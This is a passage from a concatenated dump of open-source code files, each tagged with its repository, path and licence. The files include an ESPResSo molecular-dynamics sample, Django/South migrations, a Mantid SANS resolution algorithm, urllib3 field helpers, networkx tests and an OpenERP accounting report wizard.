Generic.Prompt: "bold #c65d09",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "border:#FF0000"
}
| mit |
KKleinbeck/Espresso-Personal | samples/python/lj_liquid.py | 4 | 6626 | #
# Copyright (C) 2013,2014 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import print_function
import espressomd._system as es
import espressomd
from espressomd import thermostat
from espressomd import code_info
from espressomd import analyze
from espressomd import integrate
import numpy
print("""
=======================================================
= lj_liquid.py =
=======================================================
Program Information:""")
print(code_info.features())
dev="cpu"
# System parameters
#############################################################
# 10 000 Particles
box_l = 10.7437
density = 0.7
# Interaction parameters (repulsive Lennard Jones)
#############################################################
lj_eps = 1.0
lj_sig = 1.0
lj_cut = 1.12246
lj_cap = 20
# Integration parameters
#############################################################
system = espressomd.System()
system.time_step = 0.01
system.skin = 0.4
#es._espressoHandle.Tcl_Eval('thermostat langevin 1.0 1.0')
thermostat.Thermostat().setLangevin(1.0,1.0)
# warmup integration (with capped LJ potential)
warm_steps = 100
warm_n_times = 30
# do the warmup until the particles have at least the distance min__dist
min_dist = 0.9
# integration
int_steps = 1000
int_n_times = 5
#############################################################
# Setup System #
#############################################################
# Interaction setup
#############################################################
system.box_l = [box_l,box_l,box_l]
system.nonBondedInter[0,0].lennardJones.setParams(
epsilon=lj_eps, sigma=lj_sig,
cutoff=lj_cut, shift="auto")
system.nonBondedInter.setForceCap(lj_cap)
print("LJ-parameters:")
print(system.nonBondedInter[0,0].lennardJones.getParams())
# Particle setup
#############################################################
volume = box_l*box_l*box_l
n_part = int(volume*density)
for i in range(n_part):
system.part[i].pos=numpy.random.random(3)*system.box_l
analyze.distto(system, 0)
print("Simulate {} particles in a cubic simulation box {} at density {}."
.format(n_part, box_l, density).strip())
print("Interactions:\n")
act_min_dist = analyze.mindist()
print("Start with minimal distance {}".format(act_min_dist))
system.max_num_cells = 2744
#############################################################
# Warmup Integration #
#############################################################
#open Observable file
obs_file = open("pylj_liquid.obs", "w")
obs_file.write("# Time\tE_tot\tE_kin\tE_pot\n")
#set obs_file [open "$name$ident.obs" "w"]
#puts $obs_file "\# System: $name$ident"
#puts $obs_file "\# Time\tE_tot\tE_kin\t..."
print("""
Start warmup integration:
At maximum {} times {} steps
Stop if minimal distance is larger than {}
""".strip().format(warm_n_times, warm_steps, min_dist))
# set LJ cap
lj_cap = 20
system.nonBondedInter.setForceCap(lj_cap)
print(system.nonBondedInter[0,0].lennardJones)
# Warmup Integration Loop
i = 0
while (i < warm_n_times and act_min_dist < min_dist):
integrate.integrate(warm_steps)
# Warmup criterion
act_min_dist = analyze.mindist()
# print("\rrun %d at time=%f (LJ cap=%f) min dist = %f\r" % (i,system.time,lj_cap,act_min_dist), end=' ')
i += 1
# write observables
# puts $obs_file "{ time [setmd time] } [analyze energy]"
# Increase LJ cap
lj_cap = lj_cap + 10
system.nonBondedInter.setForceCap(lj_cap)
# Just to see what else we may get from the c code
print("""
ro variables:
cell_grid {0.cell_grid}
cell_size {0.cell_size}
local_box_l {0.local_box_l}
max_cut {0.max_cut}
max_part {0.max_part}
max_range {0.max_range}
max_skin {0.max_skin}
n_nodes {0.n_nodes}
n_part {0.n_part}
n_part_types {0.n_part_types}
periodicity {0.periodicity}
transfer_rate {0.transfer_rate}
verlet_reuse {0.verlet_reuse}
""".format(system))
# write parameter file
#polyBlockWrite "$name$ident.set" {box_l time_step skin} ""
set_file = open("pylj_liquid.set", "w")
set_file.write("box_l %s\ntime_step %s\nskin %s\n" % (box_l, system.time_step, system.skin))
#############################################################
# Integration #
#############################################################
print("\nStart integration: run %d times %d steps" % (int_n_times, int_steps))
# remove force capping
lj_cap = 0
system.nonBondedInter.setForceCap(lj_cap)
print(system.nonBondedInter[0,0].lennardJones)
# print initial energies
#energies = es._espressoHandle.Tcl_Eval('analyze energy')
energies = analyze.energy(system=system)
print(energies)
j = 0
for i in range(0,int_n_times):
print("run %d at time=%f " % (i,system.time))
# es._espressoHandle.Tcl_Eval('integrate %d' % int_steps)
integrate.integrate(int_steps)
# energies = es._espressoHandle.Tcl_Eval('analyze energy')
energies = analyze.energy(system=system)
print(energies)
obs_file.write('{ time %s } %s\n' % (system.time,energies))
# write observables
# set energies [analyze energy]
# puts $obs_file "{ time [setmd time] } $energies"
# puts -nonewline "temp = [expr [lindex $energies 1 1]/(([degrees_of_freedom]/2.0)*[setmd n_part])]\r"
# flush stdout
# write intermediate configuration
# if { $i%10==0 } {
# polyBlockWrite "$name$ident.[format %04d $j]" {time box_l} {id pos type}
# incr j
# }
# write end configuration
end_file = open("pylj_liquid.end", "w")
end_file.write("{ time %f } \n { box_l %f }\n" % (system.time, box_l) )
end_file.write("{ particles {id pos type} }")
for i in range(n_part):
end_file.write("%s\n" % system.part[i].pos)
# id & type not working yet
obs_file.close()
set_file.close()
end_file.close()
#es._espressoHandle.die()
# terminate program
print("\nFinished.")
| gpl-3.0 |
localwiki/localwiki-backend-server | localwiki/tags/migrations/0001_initial.py | 3 | 13018 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Tag'
db.create_table('tags_tag', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
('slug', self.gf('django.db.models.fields.CharField')(unique=True, max_length=100)),
))
db.send_create_signal('tags', ['Tag'])
# Adding model 'Tag_hist'
db.create_table('tags_tag_hist', (
('id', self.gf('django.db.models.fields.IntegerField')(db_index=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
('slug', self.gf('django.db.models.fields.CharField')(max_length=100, db_index=True)),
('history_id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('history_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('history_type', self.gf('django.db.models.fields.SmallIntegerField')()),
('history_reverted_to_version', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tags.Tag_hist'], null=True)),
('history_comment', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
('history_user', self.gf('versionutils.versioning.fields.AutoUserField')(to=orm['auth.User'], null=True)),
('history_user_ip', self.gf('versionutils.versioning.fields.AutoIPAddressField')(max_length=15, null=True)),
))
db.send_create_signal('tags', ['Tag_hist'])
# Adding model 'PageTagSet'
db.create_table('tags_pagetagset', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['pages.Page'], unique=True)),
))
db.send_create_signal('tags', ['PageTagSet'])
# Adding M2M table for field tags on 'PageTagSet'
db.create_table('tags_pagetagset_tags', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pagetagset', models.ForeignKey(orm['tags.pagetagset'], null=False)),
('tag', models.ForeignKey(orm['tags.tag'], null=False))
))
db.create_unique('tags_pagetagset_tags', ['pagetagset_id', 'tag_id'])
# Adding model 'PageTagSet_hist'
db.create_table('tags_pagetagset_hist', (
('id', self.gf('django.db.models.fields.IntegerField')(db_index=True, blank=True)),
('history_id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('history_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('history_type', self.gf('django.db.models.fields.SmallIntegerField')()),
('history_reverted_to_version', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tags.PageTagSet_hist'], null=True)),
('history_comment', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
('history_user', self.gf('versionutils.versioning.fields.AutoUserField')(to=orm['auth.User'], null=True)),
('history_user_ip', self.gf('versionutils.versioning.fields.AutoIPAddressField')(max_length=15, null=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['pages.Page_hist'])),
))
db.send_create_signal('tags', ['PageTagSet_hist'])
# Adding M2M table for field tags on 'PageTagSet_hist'
db.create_table('tags_pagetagset_hist_tags', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('pagetagset_hist', models.ForeignKey(orm['tags.pagetagset_hist'], null=False)),
('tag_hist', models.ForeignKey(orm['tags.tag_hist'], null=False))
))
db.create_unique('tags_pagetagset_hist_tags', ['pagetagset_hist_id', 'tag_hist_id'])
def backwards(self, orm):
# Deleting model 'Tag'
db.delete_table('tags_tag')
# Deleting model 'Tag_hist'
db.delete_table('tags_tag_hist')
# Deleting model 'PageTagSet'
db.delete_table('tags_pagetagset')
# Removing M2M table for field tags on 'PageTagSet'
db.delete_table('tags_pagetagset_tags')
# Deleting model 'PageTagSet_hist'
db.delete_table('tags_pagetagset_hist')
# Removing M2M table for field tags on 'PageTagSet_hist'
db.delete_table('tags_pagetagset_hist_tags')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'pages.page': {
'Meta': {'object_name': 'Page'},
'content': ('pages.fields.WikiHTMLField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
},
'pages.page_hist': {
'Meta': {'ordering': "('-history_date',)", 'object_name': 'Page_hist'},
'content': ('pages.fields.WikiHTMLField', [], {}),
'history_comment': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_reverted_to_version': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page_hist']", 'null': 'True'}),
'history_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'history_user': ('versionutils.versioning.fields.AutoUserField', [], {'to': "orm['auth.User']", 'null': 'True'}),
'history_user_ip': ('versionutils.versioning.fields.AutoIPAddressField', [], {'max_length': '15', 'null': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'tags.pagetagset': {
'Meta': {'ordering': "('page__slug',)", 'object_name': 'PageTagSet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['tags.Tag']", 'symmetrical': 'False'})
},
'tags.pagetagset_hist': {
'Meta': {'ordering': "('-history_date',)", 'object_name': 'PageTagSet_hist'},
'history_comment': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_reverted_to_version': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tags.PageTagSet_hist']", 'null': 'True'}),
'history_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'history_user': ('versionutils.versioning.fields.AutoUserField', [], {'to': "orm['auth.User']", 'null': 'True'}),
'history_user_ip': ('versionutils.versioning.fields.AutoIPAddressField', [], {'max_length': '15', 'null': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page_hist']"}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['tags.Tag_hist']", 'symmetrical': 'False'})
},
'tags.tag': {
'Meta': {'ordering': "('slug',)", 'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'tags.tag_hist': {
'Meta': {'ordering': "('-history_date',)", 'object_name': 'Tag_hist'},
'history_comment': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_reverted_to_version': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tags.Tag_hist']", 'null': 'True'}),
'history_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'history_user': ('versionutils.versioning.fields.AutoUserField', [], {'to': "orm['auth.User']", 'null': 'True'}),
'history_user_ip': ('versionutils.versioning.fields.AutoIPAddressField', [], {'max_length': '15', 'null': 'True'}),
'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'})
}
}
complete_apps = ['tags'] | gpl-2.0 |
rosswhitfield/mantid | Framework/PythonInterface/plugins/algorithms/WorkflowAlgorithms/ReactorSANSResolution.py | 3 | 4146 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
#pylint: disable=no-init
from mantid.api import *
from mantid.kernel import *
import math
class ReactorSANSResolution(PythonAlgorithm):
"""
Calculate and populate the Q resolution
"""
def category(self):
return "SANS"
def seeAlso(self):
return [ "EQSANSResolution" ]
def name(self):
return "ReactorSANSResolution"
def summary(self):
return "Compute the resolution in Q according to Mildner-Carpenter"
def PyInit(self):
# Input workspace
self.declareProperty(MatrixWorkspaceProperty("InputWorkspace", "",
direction=Direction.Input),
"Name the workspace to calculate the resolution for")
# Dummy property for temporary backward compatibility
# The output workspace property is not used and the resolution is
# added to the input workspace
self.declareProperty("OutputWorkspace", "",
doc="Obsolete: not used - The resolution is added to input workspace")
def PyExec(self):
input_ws = self.getProperty("InputWorkspace").value
# Q resolution calculation
# All distances in mm
wvl = None
if input_ws.getRun().hasProperty("wavelength"):
wvl = input_ws.getRun().getProperty("wavelength").value
d_wvl = None
if input_ws.getRun().hasProperty("wavelength-spread-ratio"):
d_wvl = input_ws.getRun().getProperty("wavelength-spread-ratio").value
elif input_ws.getRun().hasProperty("wavelength-spread"):
d_wvl = input_ws.getRun().getProperty("wavelength-spread").value
source_apert_radius = None
if input_ws.getRun().hasProperty("source-aperture-diameter"):
source_apert_radius = input_ws.getRun().getProperty("source-aperture-diameter").value/2.0
sample_apert_radius = None
if input_ws.getRun().hasProperty("sample-aperture-diameter"):
sample_apert_radius = input_ws.getRun().getProperty("sample-aperture-diameter").value/2.0
source_sample_distance = None
if input_ws.getRun().hasProperty("source-sample-distance"):
source_sample_distance = input_ws.getRun().getProperty("source-sample-distance").value
sample_detector_distance = None
if input_ws.getRun().hasProperty("sample_detector_distance"):
sample_detector_distance = input_ws.getRun().getProperty("sample_detector_distance").value
pixel_size_x = input_ws.getInstrument().getNumberParameter("x-pixel-size")[0]
if wvl is not None and d_wvl is not None \
and source_apert_radius is not None and sample_apert_radius is not None \
and source_sample_distance is not None and sample_detector_distance is not None:
k = 2.0*math.pi/wvl
res_factor = math.pow(k*source_apert_radius/source_sample_distance, 2)/4.0
res_factor += (math.pow(k*sample_apert_radius*(source_sample_distance+sample_detector_distance)
/ (source_sample_distance*sample_detector_distance), 2)/4.0)
res_factor += math.pow(k*pixel_size_x/sample_detector_distance, 2)/12.0
for i in range(len(input_ws.readDx(0))):
if len(input_ws.readDx(0)) == len(input_ws.readX(0)):
center = input_ws.readX(0)[i]
else:
center = 0.5*(input_ws.readX(0)[i] + input_ws.readX(0)[i+1])
input_ws.dataDx(0)[i] = math.sqrt(res_factor+math.pow((center*d_wvl), 2)/6.0)
else:
raise RuntimeError("ReactorSANSResolution could not find all the run parameters needed to compute the resolution.")
AlgorithmFactory.subscribe(ReactorSANSResolution)
| gpl-3.0 |
nan86150/ImageFusion | ENV2.7/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/fields.py | 1007 | 5833 | import email.utils
import mimetypes
from .packages import six
def guess_content_type(filename, default='application/octet-stream'):
"""
Guess the "Content-Type" of a file.
:param filename:
The filename to guess the "Content-Type" of using :mod:`mimetypes`.
:param default:
If no "Content-Type" can be guessed, default to `default`.
"""
if filename:
return mimetypes.guess_type(filename)[0] or default
return default
def format_header_param(name, value):
"""
Helper function to format and quote a single header parameter.
Particularly useful for header parameters which might contain
non-ASCII values, like file names. This follows RFC 2231, as
suggested by RFC 2388 Section 4.4.
:param name:
The name of the parameter, a string expected to be ASCII only.
:param value:
The value of the parameter, provided as a unicode string.
"""
if not any(ch in value for ch in '"\\\r\n'):
result = '%s="%s"' % (name, value)
try:
result.encode('ascii')
except UnicodeEncodeError:
pass
else:
return result
if not six.PY3: # Python 2:
value = value.encode('utf-8')
value = email.utils.encode_rfc2231(value, 'utf-8')
value = '%s*=%s' % (name, value)
return value
class RequestField(object):
"""
A data container for request body parameters.
:param name:
The name of this request field.
:param data:
The data/value body.
:param filename:
An optional filename of the request field.
:param headers:
An optional dict-like object of headers to initially use for the field.
"""
def __init__(self, name, data, filename=None, headers=None):
self._name = name
self._filename = filename
self.data = data
self.headers = {}
if headers:
self.headers = dict(headers)
@classmethod
def from_tuples(cls, fieldname, value):
"""
A :class:`~urllib3.fields.RequestField` factory from old-style tuple parameters.
Supports constructing :class:`~urllib3.fields.RequestField` from
parameter of key/value strings AND key/filetuple. A filetuple is a
(filename, data, MIME type) tuple where the MIME type is optional.
For example::
'foo': 'bar',
'fakefile': ('foofile.txt', 'contents of foofile'),
'realfile': ('barfile.txt', open('realfile').read()),
'typedfile': ('bazfile.bin', open('bazfile').read(), 'image/jpeg'),
'nonamefile': 'contents of nonamefile field',
Field names and filenames must be unicode.
"""
if isinstance(value, tuple):
if len(value) == 3:
filename, data, content_type = value
else:
filename, data = value
content_type = guess_content_type(filename)
else:
filename = None
content_type = None
data = value
request_param = cls(fieldname, data, filename=filename)
request_param.make_multipart(content_type=content_type)
return request_param
def _render_part(self, name, value):
"""
Overridable helper function to format a single header parameter.
:param name:
The name of the parameter, a string expected to be ASCII only.
:param value:
The value of the parameter, provided as a unicode string.
"""
return format_header_param(name, value)
def _render_parts(self, header_parts):
"""
Helper function to format and quote a single header.
Useful for single headers that are composed of multiple items. E.g.,
'Content-Disposition' fields.
:param header_parts:
A sequence of (k, v) typles or a :class:`dict` of (k, v) to format
as `k1="v1"; k2="v2"; ...`.
"""
parts = []
iterable = header_parts
if isinstance(header_parts, dict):
iterable = header_parts.items()
for name, value in iterable:
if value:
parts.append(self._render_part(name, value))
return '; '.join(parts)
def render_headers(self):
"""
Renders the headers for this request field.
"""
lines = []
sort_keys = ['Content-Disposition', 'Content-Type', 'Content-Location']
for sort_key in sort_keys:
if self.headers.get(sort_key, False):
lines.append('%s: %s' % (sort_key, self.headers[sort_key]))
for header_name, header_value in self.headers.items():
if header_name not in sort_keys:
if header_value:
lines.append('%s: %s' % (header_name, header_value))
lines.append('\r\n')
return '\r\n'.join(lines)
def make_multipart(self, content_disposition=None, content_type=None,
content_location=None):
"""
Makes this request field into a multipart request field.
This method overrides "Content-Disposition", "Content-Type" and
"Content-Location" headers to the request parameter.
:param content_type:
The 'Content-Type' of the request body.
:param content_location:
The 'Content-Location' of the request body.
"""
self.headers['Content-Disposition'] = content_disposition or 'form-data'
self.headers['Content-Disposition'] += '; '.join([
'', self._render_parts(
(('name', self._name), ('filename', self._filename))
)
])
self.headers['Content-Type'] = content_type
self.headers['Content-Location'] = content_location
| mit |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/networkx/generators/tests/test_directed.py | 77 | 1313 | #!/usr/bin/env python
"""Generators - Directed Graphs
----------------------------
"""
from nose.tools import *
from networkx import *
from networkx.generators.directed import *
class TestGeneratorsDirected():
def test_smoke_test_random_graphs(self):
G=gn_graph(100)
G=gnr_graph(100,0.5)
G=gnc_graph(100)
G=scale_free_graph(100)
def test_create_using_keyword_arguments(self):
assert_raises(networkx.exception.NetworkXError,
gn_graph, 100, create_using=Graph())
assert_raises(networkx.exception.NetworkXError,
gnr_graph, 100, 0.5, create_using=Graph())
assert_raises(networkx.exception.NetworkXError,
gnc_graph, 100, create_using=Graph())
assert_raises(networkx.exception.NetworkXError,
scale_free_graph, 100, create_using=Graph())
G=gn_graph(100,seed=1)
MG=gn_graph(100,create_using=MultiDiGraph(),seed=1)
assert_equal(G.edges(), MG.edges())
G=gnr_graph(100,0.5,seed=1)
MG=gnr_graph(100,0.5,create_using=MultiDiGraph(),seed=1)
assert_equal(G.edges(), MG.edges())
G=gnc_graph(100,seed=1)
MG=gnc_graph(100,create_using=MultiDiGraph(),seed=1)
assert_equal(G.edges(), MG.edges())
| mit |
darcy0511/Dato-Core | cxxtest/python/cxxtest/__init__.py | 48 | 1301 | #-------------------------------------------------------------------------
# CxxTest: A lightweight C++ unit testing library.
# Copyright (c) 2008 Sandia Corporation.
# This software is distributed under the LGPL License v2.1
# For more information, see the COPYING file in the top CxxTest directory.
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
#-------------------------------------------------------------------------
"""cxxtest: A Python package that supports the CxxTest test framework for C/C++.
.. _CxxTest: http://cxxtest.tigris.org/
CxxTest is a unit testing framework for C++ that is similar in
spirit to JUnit, CppUnit, and xUnit. CxxTest is easy to use because
it does not require precompiling a CxxTest testing library, it
employs no advanced features of C++ (e.g. RTTI) and it supports a
very flexible form of test discovery.
The cxxtest Python package includes capabilities for parsing C/C++ source files and generating
CxxTest drivers.
"""
from cxxtest.__release__ import __version__, __date__
__date__
__version__
__maintainer__ = "William E. Hart"
__maintainer_email__ = "whart222@gmail.com"
__license__ = "LGPL"
__url__ = "http://cxxtest.tigris.org/"
from cxxtest.cxxtestgen import *
| agpl-3.0 |
pyemma/scalable-python-app | Lesson_4/00_Conference_Central/utils.py | 384 | 1576 | import json
import os
import time
import uuid
from google.appengine.api import urlfetch
from models import Profile
def getUserId(user, id_type="email"):
if id_type == "email":
return user.email()
if id_type == "oauth":
"""A workaround implementation for getting userid."""
auth = os.getenv('HTTP_AUTHORIZATION')
bearer, token = auth.split()
token_type = 'id_token'
if 'OAUTH_USER_ID' in os.environ:
token_type = 'access_token'
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% (token_type, token))
user = {}
wait = 1
for i in range(3):
resp = urlfetch.fetch(url)
if resp.status_code == 200:
user = json.loads(resp.content)
break
elif resp.status_code == 400 and 'invalid_token' in resp.content:
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
% ('access_token', token))
else:
time.sleep(wait)
wait = wait + i
return user.get('user_id', '')
if id_type == "custom":
# implement your own user_id creation and getting algorythm
# this is just a sample that queries datastore for an existing profile
# and generates an id if profile does not exist for an email
profile = Conference.query(Conference.mainEmail == user.email())
if profile:
return profile.id()
else:
return str(uuid.uuid1().get_hex())
| gpl-3.0 |
duyetdev/openerp-6.1.1 | openerp/addons/account/wizard/account_report_common.py | 7 | 9111 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from lxml import etree
from osv import fields, osv
from tools.translate import _
class account_common_report(osv.osv_memory):
_name = "account.common.report"
_description = "Account Common Report"
def onchange_chart_id(self, cr, uid, ids, chart_account_id=False, context=None):
if chart_account_id:
company_id = self.pool.get('account.account').browse(cr, uid, chart_account_id, context=context).company_id.id
return {'value': {'company_id': company_id}}
_columns = {
'chart_account_id': fields.many2one('account.account', 'Chart of Account', help='Select Charts of Accounts', required=True, domain = [('parent_id','=',False)]),
'company_id': fields.related('chart_account_id', 'company_id', type='many2one', relation='res.company', string='Company', readonly=True),
'fiscalyear_id': fields.many2one('account.fiscalyear', 'Fiscal Year', help='Keep empty for all open fiscal year'),
'filter': fields.selection([('filter_no', 'No Filters'), ('filter_date', 'Date'), ('filter_period', 'Periods')], "Filter by", required=True),
'period_from': fields.many2one('account.period', 'Start Period'),
'period_to': fields.many2one('account.period', 'End Period'),
'journal_ids': fields.many2many('account.journal', string='Journals', required=True),
'date_from': fields.date("Start Date"),
'date_to': fields.date("End Date"),
'target_move': fields.selection([('posted', 'All Posted Entries'),
('all', 'All Entries'),
], 'Target Moves', required=True),
}
def _check_company_id(self, cr, uid, ids, context=None):
for wiz in self.browse(cr, uid, ids, context=context):
company_id = wiz.company_id.id
if wiz.fiscalyear_id and company_id != wiz.fiscalyear_id.company_id.id:
return False
if wiz.period_from and company_id != wiz.period_from.company_id.id:
return False
if wiz.period_to and company_id != wiz.period_to.company_id.id:
return False
return True
_constraints = [
(_check_company_id, 'The fiscalyear, periods or chart of account chosen have to belong to the same company.', ['chart_account_id','fiscalyear_id','period_from','period_to']),
]
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
res = super(account_common_report, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=False)
if context.get('active_model', False) == 'account.account' and view_id:
doc = etree.XML(res['arch'])
nodes = doc.xpath("//field[@name='chart_account_id']")
for node in nodes:
node.set('readonly', '1')
node.set('help', 'If you print the report from Account list/form view it will not consider Charts of account')
res['arch'] = etree.tostring(doc)
return res
def onchange_filter(self, cr, uid, ids, filter='filter_no', fiscalyear_id=False, context=None):
res = {'value': {}}
if filter == 'filter_no':
res['value'] = {'period_from': False, 'period_to': False, 'date_from': False ,'date_to': False}
if filter == 'filter_date':
res['value'] = {'period_from': False, 'period_to': False, 'date_from': time.strftime('%Y-01-01'), 'date_to': time.strftime('%Y-%m-%d')}
if filter == 'filter_period' and fiscalyear_id:
start_period = end_period = False
cr.execute('''
SELECT * FROM (SELECT p.id
FROM account_period p
LEFT JOIN account_fiscalyear f ON (p.fiscalyear_id = f.id)
WHERE f.id = %s
AND p.special = false
ORDER BY p.date_start ASC, p.special ASC
LIMIT 1) AS period_start
UNION ALL
SELECT * FROM (SELECT p.id
FROM account_period p
LEFT JOIN account_fiscalyear f ON (p.fiscalyear_id = f.id)
WHERE f.id = %s
AND p.date_start < NOW()
AND p.special = false
ORDER BY p.date_stop DESC
